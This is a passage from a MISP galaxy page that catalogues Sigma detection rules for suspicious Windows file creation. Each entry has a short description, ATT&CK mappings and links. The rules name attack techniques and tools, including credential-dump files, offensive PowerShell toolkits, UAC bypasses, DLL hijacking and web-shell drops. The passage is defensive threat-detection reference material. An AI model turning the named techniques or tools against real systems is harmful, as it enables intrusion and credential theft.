https://github.com/Porchetta-Industries/CrackMapExec

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_remote_cred_dump.yml

Windows Shell/Scripting Application File Write to Suspicious Folder

Detects Windows shells and scripting applications that write files to suspicious folders

The tag is: misp-galaxy:sigma-rules="Windows Shell/Scripting Application File Write to Suspicious Folder"

Windows Shell/Scripting Application File Write to Suspicious Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 9901. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_shell_write_susp_directory.yml

WScript or CScript Dropper - File

Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe

The tag is: misp-galaxy:sigma-rules="WScript or CScript Dropper - File"

WScript or CScript Dropper - File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

Table 9902. Table References

Links

WScript or CScript Dropper (cea72823-df4d-4567-950c-0b579eaf0846)[WScript or CScript Dropper (cea72823-df4d-4567-950c-0b579eaf0846)]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cscript_wscript_dropper.yml

Potential Persistence Via Microsoft Office Add-In

Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via Microsoft Office Add-In"

Potential Persistence Via Microsoft Office Add-In has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Add-ins - T1137.006" with estimative-language:likelihood-probability="almost-certain"

Table 9903. Table References

Links

https://labs.withsecure.com/publications/add-in-opportunities-for-office-persistence

Internal Research[Internal Research]

https://github.com/redcanaryco/atomic-red-team/blob/4ae9580a1a8772db87a1b6cdb0d03e5af231e966/atomics/T1137.006/T1137.006.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_addin_persistence.yml

Remote Access Tool - ScreenConnect Temporary File

Detects the creation of files in a specific location by ScreenConnect RMM. ScreenConnect has feature to remotely execute binaries on a target machine. These binaries will be dropped to ":\Users\<username>\Documents\ConnectWiseControl\Temp\" before execution.

The tag is: misp-galaxy:sigma-rules="Remote Access Tool - ScreenConnect Temporary File"

Remote Access Tool - ScreenConnect Temporary File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

Table 9904. Table References

Links

https://github.com/SigmaHQ/sigma/pull/4467

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_remote_access_tools_screenconnect_remote_file.yml

Legitimate Application Dropped Script

Detects programs on a Windows system that should not write scripts to disk

The tag is: misp-galaxy:sigma-rules="Legitimate Application Dropped Script"

Legitimate Application Dropped Script has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 9905. Table References

Links

https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_legitimate_app_dropping_script.yml

Uncommon File Created In Office Startup Folder

Detects the creation of a file with an uncommon extension in an Office application startup folder

The tag is: misp-galaxy:sigma-rules="Uncommon File Created In Office Startup Folder"

Uncommon File Created In Office Startup Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malware - T1587.001" with estimative-language:likelihood-probability="almost-certain"

Table 9906. Table References

Links

http://addbalance.com/word/startup.htm

https://answers.microsoft.com/en-us/msoffice/forum/all/document-in-word-startup-folder-doesnt-open-when/44ab0932-2917-4150-8cdc-2f2cf39e86f3

https://en.wikipedia.org/wiki/List_of_Microsoft_Office_filename_extensions

https://app.any.run/tasks/d6fe6624-6ef8-485d-aa75-3d1bdda2a08c/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_uncommon_file_startup.yml

WinSxS Executable File Creation By Non-System Process

Detects the creation of binaries in the WinSxS folder by non-system processes

The tag is: misp-galaxy:sigma-rules="WinSxS Executable File Creation By Non-System Process"

Table 9907. Table References

Links

https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_winsxs_binary_creation.yml

Potentially Suspicious DMP/HDMP File Creation

Detects the creation of a file with the ".dmp"/".hdmp" extension by a shell or scripting application such as "cmd", "powershell", etc. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It’s best to determine the source of the crash.

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious DMP/HDMP File Creation"

Table 9908. Table References

Links

https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_dump_file_susp_creation.yml

Suspicious Executable File Creation

Detect creation of suspicious executable file name. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.

The tag is: misp-galaxy:sigma-rules="Suspicious Executable File Creation"

Suspicious Executable File Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hide Artifacts - T1564" with estimative-language:likelihood-probability="almost-certain"

Table 9909. Table References

Links

https://app.any.run/tasks/76c69e2d-01e8-49d9-9aea-fb7cc0c4d3ad/

https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_executable_creation.yml

Potential Homoglyph Attack Using Lookalike Characters in Filename

Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.

The tag is: misp-galaxy:sigma-rules="Potential Homoglyph Attack Using Lookalike Characters in Filename"

Potential Homoglyph Attack Using Lookalike Characters in Filename has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"

Table 9910. Table References

Links

http://www.irongeek.com/homoglyph-attack-generator.php

https://redcanary.com/threat-detection-report/threats/socgholish/#threat-socgholish

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_homoglyph_filename.yml

GatherNetworkInfo.VBS Reconnaissance Script Output

Detects creation of files which are the results of executing the built-in reconnaissance script "C:\Windows\System32\gatherNetworkInfo.vbs".

The tag is: misp-galaxy:sigma-rules="GatherNetworkInfo.VBS Reconnaissance Script Output"

Table 9911. Table References

Links

https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government

https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lolbin_gather_network_info_script_output.yml

LiveKD Kernel Memory Dump File Created

Detects the creation of a file that has the same name as the default LiveKD kernel memory dump.

The tag is: misp-galaxy:sigma-rules="LiveKD Kernel Memory Dump File Created"

Table 9912. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sysinternals_livekd_default_dump_name.yml

Visual Studio Code Tunnel Remote File Creation

Detects the creation of file by the "node.exe" process in the ".vscode-server" directory. Could be a sign of remote file creation via VsCode tunnel feature

The tag is: misp-galaxy:sigma-rules="Visual Studio Code Tunnel Remote File Creation"

Table 9913. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_vscode_tunnel_remote_creation_artefacts.yml

Potential Persistence Via Outlook Form

Detects the creation of a new Outlook form which can contain malicious code

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via Outlook Form"

Potential Persistence Via Outlook Form has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Outlook Forms - T1137.003" with estimative-language:likelihood-probability="almost-certain"

Table 9914. Table References

Links

https://www.slipstick.com/developer/custom-form/clean-outlooks-forms-cache/

https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=76

https://learn.microsoft.com/en-us/office/vba/outlook/concepts/outlook-forms/create-an-outlook-form

https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=79

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_outlook_newform.yml

Malicious DLL File Dropped in the Teams or OneDrive Folder

Detects creation of a malicious DLL file in the location where the OneDrive or Team applications Upon execution of the Teams or OneDrive application, the dropped malicious DLL file (“iphlpapi.dll”) is sideloaded

The tag is: misp-galaxy:sigma-rules="Malicious DLL File Dropped in the Teams or OneDrive Folder"

Malicious DLL File Dropped in the Teams or OneDrive Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

Table 9915. Table References

Links

https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iphlpapi_dll_sideloading.yml

UEFI Persistence Via Wpbbin - FileCreation

Detects creation of a file named "wpbbin" in the "%systemroot%\system32\" directory. Which could be indicative of UEFI based persistence method

The tag is: misp-galaxy:sigma-rules="UEFI Persistence Via Wpbbin - FileCreation"

UEFI Persistence Via Wpbbin - FileCreation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Firmware - T1542.001" with estimative-language:likelihood-probability="almost-certain"

Table 9916. Table References

Links

https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c

https://persistence-info.github.io/Data/wpbbin.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wpbbin_persistence.yml

TeamViewer Remote Session

Detects the creation of log files during a TeamViewer remote session

The tag is: misp-galaxy:sigma-rules="TeamViewer Remote Session"

TeamViewer Remote Session has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 9917. Table References

Links

https://www.teamviewer.com/en-us/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_teamviewer_remote_session.yml

BloodHound Collection Files

Detects default file names outputted by the BloodHound collection tool SharpHound

The tag is: misp-galaxy:sigma-rules="BloodHound Collection Files"

BloodHound Collection Files has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9918. Table References

Links

https://academy.hackthebox.com/course/preview/active-directory-bloodhound/bloodhound—​data-collection

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_bloodhound_collection.yml

Creation of an WerFault.exe in Unusual Folder

Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking

The tag is: misp-galaxy:sigma-rules="Creation of an WerFault.exe in Unusual Folder"

Creation of an WerFault.exe in Unusual Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"

Table 9919. Table References

Links

https://www.bleepingcomputer.com/news/security/hackers-are-now-hiding-malware-in-windows-event-logs/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_werfault_dll_hijacking.yml

Octopus Scanner Malware

Detects Octopus Scanner Malware.

The tag is: misp-galaxy:sigma-rules="Octopus Scanner Malware"

Octopus Scanner Malware has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1195" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Compromise Software Dependencies and Development Tools - T1195.001" with estimative-language:likelihood-probability="almost-certain"

Table 9920. Table References

Links

https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_octopus_scanner.yml

Created Files by Microsoft Sync Center

This rule detects suspicious files created by Microsoft Sync Center (mobsync)

The tag is: misp-galaxy:sigma-rules="Created Files by Microsoft Sync Center"

Created Files by Microsoft Sync Center has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 9921. Table References

Links

https://redcanary.com/blog/intelligence-insights-november-2021/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_creation_by_mobsync.yml

Suspicious Binary Writes Via AnyDesk

Detects AnyDesk writing binary files to disk other than "gcapi.dll". According to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll, which is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)

The tag is: misp-galaxy:sigma-rules="Suspicious Binary Writes Via AnyDesk"

Suspicious Binary Writes Via AnyDesk has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 9922. Table References

Links

https://redcanary.com/blog/misbehaving-rats/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_anydesk_writing_susp_binaries.yml

Potential RipZip Attack on Startup Folder

Detects a phishing attack which expands a ZIP file containing a malicious shortcut. If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder. Additionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.

The tag is: misp-galaxy:sigma-rules="Potential RipZip Attack on Startup Folder"

Potential RipZip Attack on Startup Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Boot or Logon Autostart Execution - T1547" with estimative-language:likelihood-probability="almost-certain"

Table 9923. Table References

Links

https://twitter.com/jonasLyk/status/1549338335243534336?t=CrmPocBGLbDyE4p6zTX1cg&s=19

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ripzip_attack.yml

Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream

Detects the creation of hidden file/folder with the "::$index_allocation" stream. Which can be used as a technique to prevent access to folder and files from tooling such as "explorer.exe" and "powershell.exe"

The tag is: misp-galaxy:sigma-rules="Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream"

Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

Table 9924. Table References

Links

https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/

https://twitter.com/pfiatde/status/1681977680688738305

https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/c54dec26-1551-4d3a-a0ea-4fa40f848eb3

https://github.com/redcanaryco/atomic-red-team/blob/5c3b23002d2bbede3c07e7307165fc2a235a427d/atomics/T1564.004/T1564.004.md#atomic-test-5---create-hidden-directory-via-index_allocation

https://sec-consult.com/blog/detail/pentesters-windows-ntfs-tricks-collection/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_hidden_dir_index_allocation.yml

UAC Bypass Using Windows Media Player - File

Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)

The tag is: misp-galaxy:sigma-rules="UAC Bypass Using Windows Media Player - File"

UAC Bypass Using Windows Media Player - File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 9926. Table References

Links

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_wmp.yml

Malicious PowerShell Scripts - FileCreation

Detects the creation of known offensive powershell scripts used for exploitation

The tag is: misp-galaxy:sigma-rules="Malicious PowerShell Scripts - FileCreation"

Malicious PowerShell Scripts - FileCreation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9927. Table References

Links

https://github.com/nettitude/Invoke-PowerThIEf

https://github.com/adrecon/AzureADRecon

https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries

https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1

https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/

https://github.com/PowerShellMafia/PowerSploit

https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1

https://github.com/samratashok/nishang

https://github.com/NetSPI/PowerUpSQL

https://github.com/Kevin-Robertson/Powermad

https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1

https://github.com/HarmJ0y/DAMP

https://github.com/DarkCoderSc/PowerRunAsSystem/

https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1

https://github.com/adrecon/ADRecon

https://github.com/CsEnox/EventViewer-UACBypass

https://github.com/besimorhino/powercat

https://github.com/AlsidOfficial/WSUSpendu/

https://github.com/S3cur3Th1sSh1t/WinPwn

https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_exploit_scripts.yml

Suspicious File Drop by Exchange

Detects suspicious file type dropped by an Exchange component in IIS

The tag is: misp-galaxy:sigma-rules="Suspicious File Drop by Exchange"

Suspicious File Drop by Exchange has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

Table 9928. Table References

Links

https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/

https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html

https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_exchange_webshell_drop_suspicious.yml

Potential Binary Or Script Dropper Via PowerShell

Detects PowerShell creating a binary executable or a script file.

The tag is: misp-galaxy:sigma-rules="Potential Binary Or Script Dropper Via PowerShell"

Table 9929. Table References

Links

https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_drop_binary_or_script.yml

CSExec Service File Creation

Detects default CSExec service filename which indicates CSExec service installation and execution

The tag is: misp-galaxy:sigma-rules="CSExec Service File Creation"

CSExec Service File Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 9930. Table References

Links

https://github.com/malcomvetter/CSExec

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_csexec_service.yml

Suspicious MSExchangeMailboxReplication ASPX Write

Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation

The tag is: misp-galaxy:sigma-rules="Suspicious MSExchangeMailboxReplication ASPX Write"

Suspicious MSExchangeMailboxReplication ASPX Write has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploit Public-Facing Application - T1190" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

Table 9931. Table References

Links

https://redcanary.com/blog/blackbyte-ransomware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_exchange_aspx_write.yml

Suspicious File Created In PerfLogs

Detects suspicious file based on their extension being created in "C:\PerfLogs\". Note that this directory mostly contains ".etl" files

The tag is: misp-galaxy:sigma-rules="Suspicious File Created In PerfLogs"

Suspicious File Created In PerfLogs has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 9932. Table References

Links

Internal Research[Internal Research]

https://labs.withsecure.com/publications/fin7-target-veeam-servers

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_perflogs_susp_files.yml

PCRE.NET Package Temp Files

Detects processes creating temp files related to PCRE.NET package

The tag is: misp-galaxy:sigma-rules="PCRE.NET Package Temp Files"

PCRE.NET Package Temp Files has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 9933. Table References

Links

https://twitter.com/rbmaslen/status/1321859647091970051

https://twitter.com/tifkin_/status/1321916444557365248

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_pcre_net_temp_file.yml

Files With System Process Name In Unsuspected Locations

Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64, etc.).

The tag is: misp-galaxy:sigma-rules="Files With System Process Name In Unsuspected Locations"

Files With System Process Name In Unsuspected Locations has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

Table 9934. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_creation_system_file.yml

Cred Dump Tools Dropped Files

Files with well-known filenames (parts of credential dump software or files produced by them) creation

The tag is: misp-galaxy:sigma-rules="Cred Dump Tools Dropped Files"

Cred Dump Tools Dropped Files has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Cached Domain Credentials - T1003.005" with estimative-language:likelihood-probability="almost-certain"

Table 9935. Table References

Links

https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files.yml

PowerShell Profile Modification

Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence

The tag is: misp-galaxy:sigma-rules="PowerShell Profile Modification"

PowerShell Profile Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell Profile - T1546.013" with estimative-language:likelihood-probability="almost-certain"

Table 9936. Table References

Links

https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/

https://persistence-info.github.io/Data/powershellprofile.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_powershell_profile.yml

Installation of TeamViewer Desktop

TeamViewer_Desktop.exe is create during install

The tag is: misp-galaxy:sigma-rules="Installation of TeamViewer Desktop"

Installation of TeamViewer Desktop has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 9937. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-1---teamviewer-files-detected-test-on-windows

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_install_teamviewer_desktop.yml

UAC Bypass Using .NET Code Profiler on MMC

Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)

The tag is: misp-galaxy:sigma-rules="UAC Bypass Using .NET Code Profiler on MMC"

UAC Bypass Using .NET Code Profiler on MMC has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 9938. Table References

Links

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_uac_bypass_dotnet_profiler.yml

Potential Persistence Via Microsoft Office Startup Folder

Detects creation of Microsoft Office files inside of one of the default startup folders in order to achieve persistence.

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via Microsoft Office Startup Folder"

Potential Persistence Via Microsoft Office Startup Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Office Application Startup - T1137" with estimative-language:likelihood-probability="almost-certain"

Table 9939. Table References

Links

https://insight-jp.nttsecurity.com/post/102hojk/operation-restylink-apt-campaign-targeting-japanese-companies

https://learn.microsoft.com/en-us/office/troubleshoot/excel/use-startup-folders

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_startup_persistence.yml

WMI Persistence - Script Event Consumer File Write

Detects file writes of WMI script event consumer

The tag is: misp-galaxy:sigma-rules="WMI Persistence - Script Event Consumer File Write"

WMI Persistence - Script Event Consumer File Write has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003" with estimative-language:likelihood-probability="almost-certain"

Table 9941. Table References

Links

https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_wmi_persistence_script_event_consumer_write.yml

Potential DCOM InternetExplorer.Application DLL Hijack

Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class over the network

The tag is: misp-galaxy:sigma-rules="Potential DCOM InternetExplorer.Application DLL Hijack"

Potential DCOM InternetExplorer.Application DLL Hijack has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Distributed Component Object Model - T1021.003" with estimative-language:likelihood-probability="almost-certain"

Table 9942. Table References

Links

https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_dcom_iertutil_dll_hijack.yml

Suspicious desktop.ini Action

Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder’s content (i.e. renaming files) without changing them on disk.

The tag is: misp-galaxy:sigma-rules="Suspicious desktop.ini Action"

Suspicious desktop.ini Action has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"

Table 9943. Table References

Links

https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktop_ini.yml

Drop Binaries Into Spool Drivers Color Folder

Detects the creation of suspcious binary files inside the "\windows\system32\spool\drivers\color\" as seen in the blog referenced below

The tag is: misp-galaxy:sigma-rules="Drop Binaries Into Spool Drivers Color Folder"

Table 9944. Table References

Links

https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_spool_drivers_color_drop.yml

Potential Winnti Dropper Activity

Detects files dropped by Winnti as described in RedMimicry Winnti playbook

The tag is: misp-galaxy:sigma-rules="Potential Winnti Dropper Activity"

Potential Winnti Dropper Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 9945. Table References

Links

https://redmimicry.com/posts/redmimicry-winnti/#dropper

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_redmimicry_winnti_filedrop.yml

Suspicious PFX File Creation

